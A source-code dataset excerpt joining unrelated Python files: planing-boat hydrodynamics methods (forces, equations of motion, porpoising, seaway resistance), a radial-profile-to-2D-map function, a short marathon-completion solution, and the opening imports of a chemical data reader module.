sum_forces(): This function gets the sum of forces and moments, and consequently the required net thrust. The coordinates are positive aft, positive up, and positive counterclockwise.
"""
if runGeoLengths:
self.get_geo_lengths() #Calculated wetted lengths in get_forces()
g = self.g
rho_air = self.rho_air
C_D = self.C_D
rho = self.rho
nu = self.nu
AHR = self.ahr
W = self.weight
epsilon = self.epsilon
vT = self.vT
lT = self.lT
U = self.speed
b = self.beam
lcg = self.lcg
vcg = self.vcg
Lf = self.Lf
sigma = self.sigma
delta = self.delta
beam = self.beam
l_air = self.l_air
h_air = self.h_air
b_air = self.b_air
C_shape = self.C_shape
z_wl = self.z_wl
tau = self.tau
beta = self.beta
eta_3 = self.eta_3
eta_5 = self.eta_5
L_K = self.L_K
L_C = self.L_C
lambda_W = self.lambda_W
x_s = self.x_s
z_max = self.z_max
pi = np.pi
def get_hydrodynamic_force():
"""This function follows Savitsky 1964 and Faltinsen 2005 in calculating the vessel's hydrodynamic forces and moment.
"""
#Beam Froude number
Fn_B = U/np.sqrt(g*b)
#Warnings
if Fn_B < 0.6 or Fn_B > 13:
warnings.warn('Beam Froude number = {0:.3f}, outside of range of applicability (0.60 <= U/sqrt(g*b) <= 13.00) for planing lift equation. Results are extrapolations.'.format(Fn_B), stacklevel=2)
if lambda_W > 4:
warnings.warn('Mean wetted length-beam ratio = {0:.3f}, outside of range of applicability (lambda <= 4) for planing lift equation. Results are extrapolations.'.format(lambda_W), stacklevel=2)
if tau < 2 or tau > 15:
warnings.warn('Vessel trim = {0:.3f}, outside of range of applicability (2 deg <= tau <= 15 deg) for planing lift equation. Results are extrapolations.'.format(tau), stacklevel=2)
#0-Deadrise lift coefficient
C_L0 = (tau + eta_5)**1.1 * (0.012 * lambda_W**0.5 + 0.0055 * lambda_W**2.5 / Fn_B**2)
#Lift coefficient with deadrise, C_Lbeta
C_Lbeta = C_L0 - 0.0065 * beta * C_L0**0.6
#Vertical force (lift)
F_z = C_Lbeta * 0.5 * rho * U**2 * b**2
#Horizontal force
F_x = F_z*np.tan(pi/180*(tau + eta_5))
#Lift's Normal force w.r.t. keel
F_N = F_z / np.cos(pi/180*(tau + eta_5))
#Longitudinal position of the center of pressure, l_p (Eq. 4.41, Doctors 1985)
l_p = lambda_W * b * (0.75 - 1 / (5.21 * (Fn_B / lambda_W)**2 + 2.39)) #Limits for this is (0.60 < Fn_B < 13.0, lambda < 4.0)
#Moment about CG (Axis consistent with Fig. 9.24 of Faltinsen (P. 366)
M_cg = - F_N * (lcg - l_p)
#Update values
self.hydrodynamic_force = np.array([F_x, F_z, M_cg])
def get_skin_friction():
"""This function outputs the frictional force of the vessel using ITTC 1957 and the Bowden and Davison 1974 roughness coefficient.
"""
#Surface area of the dry-chine region
S1 = x_s * b / (2 * np.cos(pi/180*beta))
if L_K < x_s:
S1 = S1 * (L_K / x_s)**2
#Surface area of the wetted-chine region
S2 = b * L_C / np.cos(pi/180*beta)
#Total surface area
S = S1 + S2
if S == 0:
F_x = 0
F_z = 0
M_cg = 0
else:
#Mean bottom fluid velocity, Savitsky 1964 - Hadler's empirical formula
V_m = U * np.sqrt(1 - (0.012 * tau**1.1 * np.sqrt(lambda_W) - 0.0065 * beta * (0.012 * np.sqrt(lambda_W) * tau**1.1)**0.6) / (lambda_W * np.cos(tau * pi/180)))
#Reynolds number (with bottom fluid velocity)
Rn = V_m * lambda_W * b / nu
#'Friction coefficient' ITTC 1957
C_f = 0.075/(np.log10(Rn) - 2)**2
#Additional 'friction coefficient' due to skin friction, Bowden and Davison (1974)
deltaC_f = (44*((AHR/(lambda_W*b))**(1/3) - 10*Rn**(-1/3)) + 0.125)/10**3
#Frictional force
R_f = 0.5 * rho * (C_f + deltaC_f) * S * U**2
#Geometric vertical distance from keel
l_f = (b / 4 * np.tan(pi/180*beta) * S2 + b / 6 * np.tan(pi/180*beta) * S1) / (S1 + S2)
#Horizontal force
F_x = R_f * np.cos(pi/180*(tau + eta_5))
#Vertical force
F_z = - R_f * np.sin(pi/180*(tau + eta_5))
#Moment about CG (Axis consistent with Fig. 9.24 of Faltinsen (P. 366))
M_cg = R_f * (l_f - vcg)
#Update values
self.skin_friction = np.array([F_x, F_z, M_cg])
def get_air_resistance():
"""This function estimates the air drag. It assumes a square shape projected area with a shape coefficient.
"""
if C_shape == 0 or b_air == 0:
self.air_resistance = np.array([0, 0, 0])
return
#Vertical distance from calm water line to keel at LOA
a_dist = np.sin(pi/180*(tau + eta_5))*(l_air-L_K)
#Vertical distance from keel to horizontal line level with boat's height
b_dist = np.cos(pi/180*(tau + eta_5))*h_air
#Vertical distance from CG to center of square (moment arm, positive is CG above)
momArm = z_wl - (a_dist + b_dist)/2
#Square projected area
Area = (a_dist+b_dist)*b_air*C_shape
if Area < 0:
Area = 0
#Horizontal force (Positive aft)
F_x = 0.5*rho_air*C_D*Area*U**2
#Vertical force (Positive up)
F_z = 0
#Moment (positve CCW)
M_cg = -F_x*momArm
#Update values
self.air_resistance = np.array([F_x, F_x, M_cg])
def get_flap_force():
"""This function outputs the flap forces w.r.t. global coordinates (Savitsky & Brown 1976). Horz: Positive Aft, Vert: Positive Up, Moment: Positive CCW.
"""
if Lf == 0:
self.flap_force = np.array([0, 0, 0])
return
#Warnings
if Lf > 0.10*(L_K + L_C)/2 or Lf < 0:
warnings.warn('Flap chord = {0:.3f} outside of bounds (0-10% of mean wetted length) for flap forces estimates with Savitsky & Brown 1976'.format(Lf), stacklevel=2)
if delta < 0 or delta > 15:
warnings.warn('Flap deflection angle = {0:.3f} out of bounds (0-15 deg) for flap forces estimates with Savitsky & Brown 1976'.format(delta), stacklevel=2)
Fn_B = U/np.sqrt(g*b)
if Fn_B < 2 or Fn_B > 7:
warnings.warn('Beam-based Froude number Fn_B = {0:.3f} out of bounds (2-7) for flap forces estimates with Savitsky & Brown 1976'.format(Fn_B), stacklevel=2)
F_z = 0.046*(Lf*3.28084)*delta*sigma*(b*3.28084)*(rho/515.379)/2*(U*3.28084)**2*4.44822
F_x = 0.0052*F_z*(tau+eta_5+delta)
l_flap = 0.6*b+Lf*(1-sigma)
M_cg = -F_z*(lcg-l_flap)
#Update values
self.flap_force = np.array([F_x, F_z, M_cg])
def sum_forces():
"""This function gets the sum of forces and moments, and consequently the required net thrust. The coordinates are positive aft, positive up, and positive counterclockwise.
"""
#Call all force functions-------
get_hydrodynamic_force()
get_skin_friction()
get_air_resistance()
get_flap_force()
#-------------------------------
forcesMatrix = np.column_stack((self.gravity_force, self.hydrodynamic_force, self.skin_friction, self.air_resistance, self.flap_force)) #Forces and moments
F_sum = np.sum(forcesMatrix, axis=1) #F[0] is x-dir, F[1] is z-dir, and F[2] is moment
#Required thrust and resultant forces
T = F_sum[0]/np.cos(pi/180*(epsilon+tau+eta_5)); #Magnitude
T_z = T*np.sin(pi/180*(epsilon+tau+eta_5)); #Vertical
T_cg = T*np.cos(pi/180*epsilon)*(vcg - vT) - T*np.sin(pi/180*epsilon)*(lcg - lT); #Moment about cg
#Update resultant thurst values
self.thrust_force = np.array([-F_sum[0], T_z, T_cg])
#Include resultant thrust forces in sum
F_sum[1] = F_sum[1]+T_z
F_sum[2] = F_sum[2]+T_cg
#Update values
self.net_force = F_sum
#Call functions
sum_forces()
def get_steady_trim(self, x0=[0, 3], tauLims=[0.5, 35], tolF=10**-6, maxiter=50):
"""This function finds and sets the equilibrium point when the vessel is steadily running in calm water.
Updates the following attributes:
- :attr:`z_wl`
- :attr:`tau`
Args:
x0 (list of float): Initial guess for equilibirum point [z_wl (m), tau (deg)]. Defaults to [0, 3].
tauLims (list of float): Limits for equilibrium trim search. Defaults to [0.5, 35].
tolF (float): Tolerance for convergence to zero. Defaults to 10**-6.
maxiter (float): Maximum iterations. Defaults to 50.
"""
def _boatForces(x):
self.z_wl = x[0]/10 #the division is for normalization of the variables
self.tau = x[1]
self.get_forces()
return self.net_force[1:3]
def _boatForcesPrime(x):
return ndmath.complexGrad(_boatForces, x)
def _L_K(x):
# self.z_wl = x[0]/10
# self.tau = x[1]
# self.get_geo_lengths() #No need to call, because ndmath's nDimNewton allways calls the obj function before calling this "constraint"
return [-self.L_K]
xlims = np.array([[-np.Inf, np.Inf], tauLims])
warnings.filterwarnings("ignore", category=UserWarning)
[self.z_wl, self.tau] = ndmath.nDimNewton(_boatForces, x0, _boatForcesPrime, tolF, maxiter, xlims, hehcon=_L_K)/[10, 1]
warnings.filterwarnings("default", category=UserWarning)
def get_eom_matrices(self, runGeoLengths=True):
"""This function returns the mass, damping, and stiffness matrices following Faltinsen 2005.
Adds/updates the following parameters:
- :attr:`mass_matrix`
- :attr:`damping_matrix`
- :attr:`restoring_matrix`
Args:
runGeoLengths (boolean, optional): Calculate the wetted lengths before calculating the EOM matrices. Defaults to True.
Methods:
get_mass_matrix(): This function returns the added mass coefficients following Sec. 9.4.1 of Faltinsen 2005, including weight and moment of inertia.
get_damping_matrix(): This function returns the damping coefficients following Sec. 9.4.1 of Faltinsen 2005.
get_restoring_matrix(diffType=1, step=10**-6.6): This function returns the restoring coefficients following the approach in Sec. 9.4.1 of Faltinsen 2005.
"""
if runGeoLengths:
self.get_geo_lengths() #Calculated wetted lengths in get_eom_matrices()
W = self.weight
U = self.speed
rho = self.rho
b = self.beam
lcg = self.lcg
tau = self.tau
beta = self.beta
g = self.g
r_g = self.r_g
eta_5 = self.eta_5
L_K = self.L_K
L_C = self.L_C
lambda_W = self.lambda_W
x_s = self.x_s
z_max = self.z_max
pi = np.pi
def get_mass_matrix():
"""This function returns the added mass coefficients following Sec. 9.4.1 of Faltinsen 2005, including weight and moment of inertia
"""
#Distance of CG from keel-WL intersection
x_G = L_K - lcg
#K constant (Eq. 9.63 of Faltinsen 2005)
K = (pi / np.sin(pi/180*beta) * gamma(1.5 - beta/180) / (gamma(1 - beta/180)**2 * gamma(0.5 + beta/180)) - 1) / np.tan(pi/180*beta)
kappa = (1 + z_max) * (pi/180)*(tau + eta_5) #User defined constant
#Based on Faltinsen's
A1_33 = rho * kappa**2 * K * x_s**3 / 3
A1_35 = A1_33 * (x_G - x_s * 3/4)
A1_53 = A1_35
A1_55 = A1_33 * (x_G**2 - 3/2 * x_G * x_s + 3/5 * x_s**2)
#Contribution from wet-chine region
if L_C > 0:
C_1 = 2 * np.tan(pi/180*beta)**2 / pi * K
A2_33 = (rho * b**3) * C_1 * pi / 8 * L_C / b
A2_35 = (rho * b**4) * (- C_1 * pi / 16 * ((L_K / b)**2 - (x_s / b)**2) + x_G / b * A2_33 / (rho * b**3))
A2_53 = A2_35
A2_55 = (rho * b**5) * (C_1 * pi / 24 * ((L_K / b)**3 - (x_s / b)**3) - C_1 / 8 * pi * (x_G / b) * ((L_K / b)**2 - (x_s / b)**2) + (x_G / b)**2 * A2_33 / (rho * b**3))
else:
A2_33 = 0
A2_35 = 0
A2_53 = 0
A2_55 = 0
#Total added mass & update values
A_33 = A1_33 + A2_33 + W/g # kg, A_33
A_35 = A1_35 + A2_35 # kg*m/rad, A_35
A_53 = A1_53 + A2_53 # kg*m, A_53
A_55 = A1_55 + A2_55 + W/g*r_g**2 # kg*m^2/rad, A_55
self.mass_matrix = np.array([[A_33, A_35], [A_53, A_55]])
def get_damping_matrix():
"""This function returns the damping coefficients following Sec. 9.4.1 of Faltinsen 2005
"""
#Heave-heave added mass (need to substract W/g since it was added)
A_33 = self.mass_matrix[0,0] - W/g
if L_C > 0:
d = 0.5 * b * np.tan(pi/180*beta)
else:
d = (1 + z_max) * (pi/180)*(tau + eta_5) * L_K
#K constant (Eq. 9.63 of Faltinsen 2005, P. 369)
K = (pi / np.sin(pi/180*beta) * gamma(1.5 - beta/180) / (gamma(1 - beta/180)**2 * gamma(0.5 + beta/180)) - 1) / np.tan(pi/180*beta)
#2D Added mass coefficient in heave
a_33 = rho * d**2 * K
#Infinite Fn lift coefficient
C_L0 = (tau + eta_5)**1.1 * 0.012 * lambda_W**0.5
#Derivative w.r.t. tau (rad) of inf. Fn C_L0
dC_L0 = (180 / pi)**1.1 * 0.0132 * (pi/180*(tau + eta_5))**0.1 * lambda_W**0.5
#Derivative w.r.t. tau (rad) of inf. Fn C_Lbeta
dC_Lbeta = dC_L0 * (1 - 0.0039 * beta * C_L0**-0.4)
#Damping coefficients & update values
B_33 = rho / 2 * U * b**2 * dC_Lbeta # kg/s, B_33, Savitsky based
B_35 = - U * (A_33 + lcg * a_33) # kg*m/(s*rad), B_35, Infinite frequency based
B_53 = B_33 * (0.75 * lambda_W * b - lcg) # kg*m/s, B_53, Savitsky based
B_55 = U * lcg**2 * a_33 # kg*m**2/(s*rad), B_55, Infinite frequency based
self.damping_matrix = np.array([[B_33, B_35], [B_53, B_55]])
def get_restoring_matrix(diffType=1, step=10**-6.6):
"""This function returns the restoring coefficients following the approach in Sec. 9.4.1 of Faltinsen 2005
Args:
diffType (int, optional): 1 (recommended) = Complex step method, 2 = Foward step difference. Defaults to 1.
step (float, optional): Step size if using diffType == 2. Defaults to 10**-6.
"""
def _func(eta):
self.eta_3 = eta[0]
self.eta_5 = eta[1]
self.get_forces()
return self.net_force[1:3]
temp_eta_3 = self.eta_3
temp_eta_5 = self.eta_5
if diffType == 1:
C_full = -ndmath.complexGrad(_func, [temp_eta_3, temp_eta_5])
elif diffType == 2:
C_full = -ndmath.finiteGrad(_func, [temp_eta_3, temp_eta_5], 10**-6.6)
#Reset values
self.eta_3 = temp_eta_3
self.eta_5 = temp_eta_5
self.get_forces()
#Conversion deg to rad (degree in denominator)
C_full[0,1] = C_full[0,1] / (pi/180) # N/rad, C_35
C_full[1,1] = C_full[1,1] / (pi/180) # N*m/rad, C_55
#Update values
self.restoring_matrix = C_full
#Call functions
get_mass_matrix()
get_damping_matrix()
get_restoring_matrix()
def check_porpoising(self, stepEstimateType=1):
"""This function checks for porpoising.
Adds/updates the following parameters:
- :attr:`porpoising` (list):
Args:
stepEstimateType (int, optional): Pitch step response settling time estimate type, 1 = -3/np.real(eigVals[0])], 2 = Time-domain simulation estimate. Defaults to 1.
"""
#Eigenvalue analysis
try:
self.mass_matrix
except AttributeError:
warnings.warn('No Equation Of Motion (EOM) matrices found. Running get_eom_matrices().', stacklevel=2)
self.get_eom_matrices()
M = self.mass_matrix
C = self.damping_matrix
K = self.restoring_matrix
nDim = len(M)
A_ss = np.concatenate((np.concatenate((np.zeros((nDim,nDim)), np.identity(nDim)), axis=1), np.concatenate((-np.linalg.solve(M,K), -np.linalg.solve(M,C)), axis=1))) #State space reprecentation
eigVals = np.linalg.eigvals(A_ss)
eig_porpoise = any(eigVal >= 0 for eigVal in eigVals)
if stepEstimateType == 1:
settling_time = -3/np.real(eigVals[0])
elif stepEstimateType == 2:
B_ss = np.array([[1],[0],[0],[0]]) #Pitch only
C_ss = np.array([[1,0,0,0]]) #Pitch only
D_ss = np.array([[0]])
system = (A_ss,B_ss,C_ss,D_ss)
t, y = signal.step(system)
settling_time = (t[next(len(y)-i for i in range(2,len(y)-1) if abs(y[-i]/y[-1])>1.02)]-t[0])
#Savitsky '64 chart method
C_L = self.weight/(1/2*self.rho*self.speed**2*self.beam**2)
x = np.sqrt(C_L/2)
#Warnings
if x > 0.3 or x < 0.13:
warnings.warn('Lift Coefficient = {0:.3f} outside of bounds (0.0338-0.18) for porpoising estimates with Savitsky 1964. Results are extrapolations.'.format(C_L), stacklevel=2)
if self.beta > 20:
warnings.warn('Deadrise = {0:.3f} outside of bounds (0-20 deg) for porpoising estimates with Savitsky 1964. Results are extrapolations.'.format(self.beta), stacklevel=2)
tau_crit_0 = -376.37*x**3 + 329.74*x**2 - 38.485*x + 1.3415
tau_crit_10 = -356.05*x**3 + 314.36*x**2 - 41.674*x + 3.5786
tau_crit_20 = -254.51*x**3 + 239.65*x**2 - 23.936*x + 3.0195
tau_crit_func = interpolate.interp1d([0, 10, 20], [tau_crit_0, tau_crit_10, tau_crit_20], kind='quadratic', fill_value='extrapolate')
tau_crit = tau_crit_func(self.beta)
if self.tau > tau_crit:
chart_porpoise = True
else:
chart_porpoise = False
#Update values
self.porpoising = [[eig_porpoise, settling_time], [chart_porpoise, float(tau_crit)]]
def get_seaway_behavior(self):
"""This function calculates the seaway behavior as stated in Savitsky & Brown '76.
Adds/updates the following parameters:
- :attr:`avg_impact_acc`
- :attr:`R_AW`
"""
if self.H_sig is None:
self.H_sig = self.beam*0.5 #Arbitrary wave height if no user-defined wave height
warnings.warn('Significant wave height has not been specified. Using beam*0.5 = {0:.3f} m.'.format(self.H_sig), stacklevel=2)
if self.length is None:
self.length = self.beam*3
warnings.warn('Vessel length has not been specified. Using beam*3 = {0:.3f} m.'.format(self.length), stacklevel=2)
H_sig = self.H_sig
W = self.weight
beta = self.beta
tau = self.tau
pi = np.pi
Delta_LT = W/9964 #Displacement in long tons
Delta = Delta_LT*2240 #Displacement in lbf
L = self.length*3.281 #Length in ft
b = self.beam*3.281 #Beam in ft
Vk = self.speed*1.944 #Speed in knots
Vk_L = Vk/np.sqrt(L) #Vk/sqrt(L)
H_sig = H_sig*3.281 #Significant wave height in ft
w = self.rho*self.g/(4.448*35.315) #Specific weight in lbf/ft^3
C_Delta = Delta/(w*b**3) #Static beam-loading coefficient
if self.seaway_drag_type == 1: #Savitsky '76
#Check that variables are inside range of applicability (P. 395 of Savitsky & Brown '76)
P1 = Delta_LT/(0.01*L)**3
P2 = L/b
P5 = H_sig/b
P6 = Vk_L
if P1 < 100 or P1 > 250:
warnings.warn('Vessel displacement coefficient = {0:.3f}, outside of range of applicability (100 <= Delta_LT/(0.01*L)^3 <= 250, with units LT/ft^3). Results are extrapolations.'.format(P1), stacklevel=2)
if P2 < 3 or P2 > 5:
warnings.warn('Vessel length/beam = {0:.3f}, outside of range of applicability (3 <= L/b <= 5). Results are extrapolations.'.format(P2), stacklevel=2)
if tau < 3 or tau > 7:
warnings.warn('Vessel trim = {0:.3f}, outside of range of applicability (3 deg <= tau <= 7 deg). Results are extrapolations.'.format(tau), stacklevel=2)
if beta < 10 or beta > 30:
warnings.warn('Vessel deadrise = {0:.3f}, outside of range of applicability (10 deg <= beta <= 30 deg). Results are extrapolations.'.format(beta), stacklevel=2)
if P5 < 0.2 or P5 > 0.7:
warnings.warn('Significant wave height / beam = {0:.3f}, outside of range of applicability (0.2 <= H_sig/b <= 0.7). Results are extrapolations.'.format(P5), stacklevel=2)
if P6 < 2 or P6 > 6:
warnings.warn('Speed coefficient = {0:.3f}, outside of range of applicability (2 <= Vk/sqrt(L) <= 6, with units knots/ft^0.5). Results are extrapolations.'.format(P6), stacklevel=2)
R_AW_2 = (w*b**3)*66*10**-6*(H_sig/b+0.5)*(L/b)**3/C_Delta+0.0043*(tau-4) #Added resistance at Vk/sqrt(L) = 2
R_AW_4 = (Delta)*(0.3*H_sig/b)/(1+2*H_sig/b)*(1.76-tau/6-2*np.tan(beta*pi/180)**3) #Vk/sqrt(L) = 4
R_AW_6 = (w*b**3)*(0.158*H_sig/b)/(1+(H_sig/b)*(0.12*beta-21*C_Delta*(5.6-L/b)+7.5*(6-L/b))) #Vk/sqrt(L) = 6
R_AWs = np.array([R_AW_2, R_AW_4, R_AW_6])
R_AWs_interp = interpolate.interp1d([2,4,6], R_AWs, kind='quadratic', fill_value='extrapolate')
R_AW = R_AWs_interp([Vk_L])[0]
elif self.seaway_drag_type == 2: #Fridsma '71 design charts
#Check that variables are inside range of applicability (P. R-1495 of Fridsma '71)
if C_Delta < 0.3 or C_Delta > 0.9:
warnings.warn('C_Delta = {0:.3f}, outside of range of applicability (0.3 <= C_Delta <= 0.9). Results are extrapolations'.format(C_Delta), stacklevel=2)
if L/b < 3 or L/b > 6:
warnings.warn('L/b = {0:.3f}, outside of range of applicability (3 <= L/b <= 6). Results are extrapolations'.format(L/b), stacklevel=2)
if C_Delta/(L/b) < 0.06 or C_Delta/(L/b) > 0.18:
warnings.warn('C_Delta/(L/b) = {0:.3f}, outside of range of applicability (0.06 <= C_Delta/(L/b) <= 0.18). Results are extrapolations'.format(C_Delta/(L/b)), stacklevel=2)
if tau < 3 or tau > 7:
warnings.warn('tau = {0:.3f}, outside of range of applicability (3 <= tau <= 7). Results are extrapolations'.format(tau), stacklevel=2)
if beta < 10 or beta > 30:
warnings.warn('beta = {0:.3f}, outside of range of applicability (10 <= beta <= 30). Results are extrapolations'.format(beta), stacklevel=2)
if H_sig/b > 0.8:
warnings.warn('H_sig/b = {0:.3f}, outside of range of applicability (H_sig/b <= 0.8). Results are extrapolations'.format(H_sig/b), stacklevel=2)
if Vk_L > 6:
warnings.warn('Vk_L = {0:.3f}, outside of range of applicability (Vk_L <= 6). Results are extrapolations'.format(Vk_L), stacklevel=2)
#Get data tables (required for when package is distributed)
Raw2_tab = pkg_resources.resource_filename(__name__, 'tables\Raw_0.2.csv')
Raw4_tab = pkg_resources.resource_filename(__name__, 'tables\Raw_0.4.csv')
Raw6_tab = pkg_resources.resource_filename(__name__, 'tables\Raw_0.6.csv')
V2_tab = pkg_resources.resource_filename(__name__, 'tables\V_0.2.csv')
V4_tab = pkg_resources.resource_filename(__name__, 'tables\V_0.4.csv')
RawV2_tab = pkg_resources.resource_filename(__name__, 'tables\Raw_V_0.2.csv')
RawV4_tab = pkg_resources.resource_filename(__name__, 'tables\Raw_V_0.4.csv')
RawV6_tab = pkg_resources.resource_filename(__name__, 'tables\Raw_V_0.6.csv')
#Read values from extracted chart points
arr_Raw2 = np.genfromtxt(Raw2_tab, delimiter=',', skip_header=1)
arr_Raw4 = np.genfromtxt(Raw4_tab, delimiter=',', skip_header=1)
arr_Raw6 = np.genfromtxt(Raw6_tab, delimiter=',', skip_header=1)
arr_V2 = np.genfromtxt(V2_tab, delimiter=',', skip_header=1)
arr_V4 = np.genfromtxt(V4_tab, delimiter=',', skip_header=1)
arr_Raw_V2 = np.genfromtxt(RawV2_tab, delimiter=',', skip_header=1)
arr_Raw_V4 = np.genfromtxt(RawV4_tab, delimiter=',', skip_header=1)
arr_Raw_V6 = np.genfromtxt(RawV6_tab, delimiter=',', skip_header=1)
#Create interpolation functions
interp1Type = 'linear'
interp2Type = 'linear'
Raw2m_interp = interpolate.interp2d(arr_Raw2[:, 1], arr_Raw2[:, 0], arr_Raw2[:, 2], kind=interp2Type)
Raw4m_interp = interpolate.interp2d(arr_Raw4[:, 1], arr_Raw4[:, 0], arr_Raw4[:, 2], kind=interp2Type)
Raw6m_interp = interpolate.interp2d(arr_Raw6[:, 1], arr_Raw6[:, 0], arr_Raw6[:, 2], kind=interp2Type)
V2m_interp = interpolate.interp2d(arr_V2[:, 1], arr_V2[:, 0], arr_V2[:, 2], kind=interp2Type)
V4m_interp = interpolate.interp2d(arr_V4[:, 1], arr_V4[:, 0], arr_V4[:, 2], kind=interp2Type)
V6m_interp = V4m_interp
RawRaw2m_interp = interpolate.interp1d(arr_Raw_V2[:, 0], arr_Raw_V2[:, 1], kind=interp1Type, fill_value='extrapolate')
RawRaw4m_interp = interpolate.interp1d(arr_Raw_V4[:, 0], arr_Raw_V4[:, 1], kind=interp1Type, fill_value='extrapolate')
RawRaw6m_interp = interpolate.interp1d(arr_Raw_V6[:, 0], arr_Raw_V6[:, 1], kind=interp1Type, fill_value='extrapolate')
#Get values following procedure shown in Fridsma 1971 paper
VLm = [V2m_interp(beta, tau)[0], V4m_interp(beta, tau)[0], V6m_interp(beta, tau)[0]]
Rwbm = [Raw2m_interp(beta, tau)[0], Raw4m_interp(beta, tau)[0], Raw6m_interp(beta, tau)[0]]
VVm = Vk_L/VLm
RRm = [RawRaw2m_interp(VVm[0]), RawRaw4m_interp(VVm[1]), RawRaw6m_interp(VVm[2])]
Rwb = np.multiply(RRm, Rwbm)
E1 = lambda H_sig: 1 + ((L/b)**2/25 - 1)/(1 + 0.895*(H_sig/b - 0.6)) #V/sqrt(L) = 2
E2 = lambda H_sig: 1 + 10*H_sig/b*(C_Delta/(L/b) - 0.12) #V/sqrt(L) = 4
E3 = lambda H_sig: 1 + 2*H_sig/b*(0.9*(C_Delta-0.6)-0.7*(C_Delta-0.6)**2) #V/sqrt(L) = 6
E_interp = lambda H_sig: interpolate.interp1d([2, 4, 6], [E1(H_sig), E2(H_sig), E3(H_sig)], kind=interp1Type, fill_value='extrapolate')
E = [E_interp(0.2*b)(Vk_L), E_interp(0.4*b)(Vk_L), E_interp(0.6*b)(Vk_L)]
Rwb_final = np.multiply(Rwb,E)
Rwb_final_interp = interpolate.interp1d([0.2, 0.4, 0.6], Rwb_final, kind=interp1Type, fill_value='extrapolate')
R_AW = Rwb_final_interp(H_sig/b)*w*b**3
warnings.warn('Average impact acceleration based on the Fridsma charts is currently not implemented. Using Savitsky & Brown approximation.', stacklevel=2)
n_cg = 0.0104*(H_sig/b+0.084)*tau/4*(5/3-beta/30)*(Vk_L)**2*L/b/C_Delta #g, at CG
n_bow = n_cg*(1+3.8*(L/b-2.25)/(Vk_L)) #g, at bow
avg_impact_acc = np.array([n_cg, n_bow])
#Update values
self.avg_impact_acc = avg_impact_acc
self.R_AW = R_AW*4.448 #lbf to N conversion
| 52.561809 | 312 | 0.569533 | 52,157 | 0.997285 | 0 | 0 | 0 | 0 | 0 | 0 | 25,361 | 0.484923 |
0dd86d6751b718e9a801f6c2b5674a1aa993cf90 | 959 | py | Python | curve2map.py | jmilou/image_utilities | 92399acf045b4f839afb105b0aa513a27fb31094 | [
"MIT"
] | null | null | null | curve2map.py | jmilou/image_utilities | 92399acf045b4f839afb105b0aa513a27fb31094 | [
"MIT"
] | null | null | null | curve2map.py | jmilou/image_utilities | 92399acf045b4f839afb105b0aa513a27fb31094 | [
"MIT"
] | 1 | 2018-01-08T19:24:32.000Z | 2018-01-08T19:24:32.000Z | # -*- coding: utf-8 -*-
"""
Created on Tue Oct 6 09:54:17 2015
@author: jmilli
"""
import numpy as np
from scipy.interpolate import interp1d
def create2dMap(values,inputRadii=None,maxRadius=None):
"""
This function takes a 1D radial distribution in input and builds a 2map
"""
nbValues=len(values)
if inputRadii==None:
inputRadii=np.arange(0,nbValues)
maxRadius=nbValues
else:
if maxRadius==None:
raise ValueError('You must provide a maximum radius')
imageAxis = np.arange(-maxRadius/2,maxRadius/2)
x,y = np.meshgrid(imageAxis,imageAxis)
distmap = abs(x+1j*y)
# map2d = np.ndarray(distmap.shape)
radiusOK = np.isfinite(values)
func = interp1d(inputRadii[radiusOK],values[radiusOK],kind='cubic',
bounds_error=False,fill_value=np.nan)
map2d = func(distmap)
return map2d,distmap
| 29.96875 | 76 | 0.61731 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 251 | 0.261731 |
0dd886d9f601d6eaa6bdabd1f28a900d852bdcec | 543 | py | Python | lv1/hash_marathon.py | mrbartrns/programmers-algorithm | 7ecbb14c25f0cb69bec766fa4bc6b37b8cfadc47 | [
"MIT"
] | null | null | null | lv1/hash_marathon.py | mrbartrns/programmers-algorithm | 7ecbb14c25f0cb69bec766fa4bc6b37b8cfadc47 | [
"MIT"
] | null | null | null | lv1/hash_marathon.py | mrbartrns/programmers-algorithm | 7ecbb14c25f0cb69bec766fa4bc6b37b8cfadc47 | [
"MIT"
] | null | null | null | def solution(participant, completion):
answer = ''
# sort하면 시간절약이 가능
participant.sort() # [a, a, b]
completion.sort() # [a, b]
print(participant)
print(completion)
for i in range(len(completion)):
if participant[i] != completion[i]:
answer = participant[i]
break
else:
answer = participant[len(participant) - 1]
return answer
part = ['marina', 'josipa', 'nikola', 'vinko', 'filipa']
comp = ['josipa', 'filipa', 'marina', 'nikola']
print(solution(part, comp)) | 30.166667 | 56 | 0.585635 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 127 | 0.226381 |
0dd8a408a2e9a9ec0eac6d95ae185d9b08ee30c4 | 7,882 | py | Python | chemicals/data_reader.py | daar/chemicals | df3be046055055b99ae762e7a4b852a63134fc82 | [
"MIT"
] | null | null | null | chemicals/data_reader.py | daar/chemicals | df3be046055055b99ae762e7a4b852a63134fc82 | [
"MIT"
] | null | null | null | chemicals/data_reader.py | daar/chemicals | df3be046055055b99ae762e7a4b852a63134fc82 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2020 Caleb Bell <Caleb.Andrew.Bell@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
__all__ = ['df_sources',
'data_source',
'register_df_source',
'load_df',
'retrieve_any_from_df_dict',
'retrieve_from_df_dict',
'retrieve_any_from_df',
'retrieve_from_df',
'list_available_methods_from_df_dict',
'list_available_methods_from_df']
import os
from math import isnan, nan
try:
path_join = os.path.join
except: # pragma: no cover
pass
try:
import numpy as np
object_dtype = np.dtype(object)
float64_dtype = np.dtype(np.float64)
float32_dtype = np.dtype(np.float32)
int64_dtype = np.dtype(np.int64)
int32_dtype = np.dtype(np.int32)
int16_dtype = np.dtype(np.int16)
